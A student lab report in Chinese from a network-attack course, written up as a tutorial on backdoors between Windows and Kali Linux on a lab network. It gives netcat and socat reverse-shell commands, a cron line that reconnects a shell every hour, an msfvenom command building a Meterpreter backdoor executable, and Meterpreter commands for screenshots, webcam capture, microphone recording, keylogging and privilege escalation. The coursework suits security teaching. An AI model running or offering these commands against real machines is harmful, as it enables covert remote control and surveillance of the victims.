20154309 【网络对抗技术】Exp2: 后门原理与实践
学习内容:
·使用nc实现win,mac,Linux间的后门连接
·meterpreter的应用
·MSF POST模板的应用
一、后门工具介绍
1.netcat(nc、ncat)
·是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使
用,起到后门作用。
2.socat
·类似于Netcat的加强版
3.Meterpreter
·利用Metaspolit
的msfvenom
指令生成后门可执行文件,本实验要生成这个后门程序就是Meterpreter
二、ncat、socat的基础操作
2.1 Windows与Linux间获取Shell
2.1.1 Windows主机获取 Linux Shell
Windows:
1.查询本机Ip地址:ipconfig
注意:在多个IP地址中,有两个是VMware的虚拟网卡产生的虚拟IP地址,
不用采用
由图得IPV4地址为:192.168.1.111
2.利用netcat.exe程序监听端口:4309
PS: cd查找路径
kali
3.使用nc 192.168.1.111 4309 -e
反向连接Windows主机的4309端口
这张图忘截了...
4.Windows执行linux shell指令
2.1.2 Linux获取Win主机 Shell
Kali
1.查询虚拟机IP地址:ifconfig
IP地址为192.168.186.130
2.Linux系统打开监听端口nc -l -p 4309
3.Windows反弹连接Linux
要找准端口,不然会被积极拒绝...
4.Linux下看到Windows的命令提示
连接成功便可以在Linux下输入Windows指令,此时可以发现汉字为乱码。
2.2 ncat进行数据传输
1.Windows下监听窗口
2.Kali下连接到Windows的端口
3.建立连接后,即可以传输数据
结果图如图所示:
2.3 ncat定时启动
1.Windows输入指令ncat.exe -l -p 4309
监听
2.在Kali环境下用 crontab -e 编辑定时任务
在最后一行添加 N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh
,意思是在每个小时的第N分钟反向连接Windows主机的端口,就会启动cron。此处的我取N=21
3.当时间到指定分钟,就已经获得了Kali的shell:
2.4 socat定时启动
1.在Windows桌面按键win+I
,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务
2.新建一个触发器
3.新建一个操作
4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行
5.Linux输入指令 socat - tcp:192.168.239.1:4305
, windows主机IP、端口号,此时可以获取win的shell命令
三、体验 MSF Meterpreter 功能
3.1 利用msfvenom指令生成后门程序
1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154309_backdoor.exe
,此条指令意为生成一个.exe程序,名称为 20154309_backdoor,将来在windows上运行时会回连到Linux主机相应端口
![](
2.成功之后该文件在当前目录,找到之后拷贝到Windows主机,地址我设置在桌面上
3.2 Linux进入控制台进行设置
1.Linux输入指令msfconsole
2.在msf>下输入命令use exploit/multi/handler
3.继续输入set payload windows/meterpreter/reverse_tcp 设置payload
4.输入指令set LHOST Linux IP
5.输入指令 set LPORT 4305
6.输入指令show options
3.3 Linux打开监听,Windows运行后门
1.Linux输入指令exploit
开始监听
2.win运行后门木马程序,可通过双击或者cmd执行
3.4 Linux主机操作Windows主机
1.输入指令screenshot
截取屏幕
2.输入指令 webcam_snap
拍摄照片
只有背光的(▽)
3.输入指令record_mic
录制一段音频
4.输入指令keyscan_start
记录击键内容,输入指令keyscan_dump
获取击键记录
5.输入指令getuid
查看当前用户,输入指令getsystem
提权
四、回答问题
1.例举你能想到的一个后门进入到你系统中的可能方式?
通过非正版网站下载软件绑定的非法软件或其他插件。
2.例举你知道的后门如何启动起来(win及linux)的方式?
打开监听端口,搜集靶机发出信号,连接即可启动后门。
3.Meterpreter有哪些给你映像深刻的功能?
能控制电脑的输入、输出端口设备。
4.如何发现自己有系统有没有被安装后门?
通过在AV软件或者网络平台进行电脑扫描。
五、实验感想
通过这次实验,切身地感受到了后门的威力,它能通过多种途径甚至很简单的方法潜入你的电脑,却能用多种手段影响到你的操作。真心地体会到在平时一定要增强
自己的安全意识。
posted on 2018-04-04 11:12 4309yanqing 阅读(244) 评论(0) 编辑 收藏 举报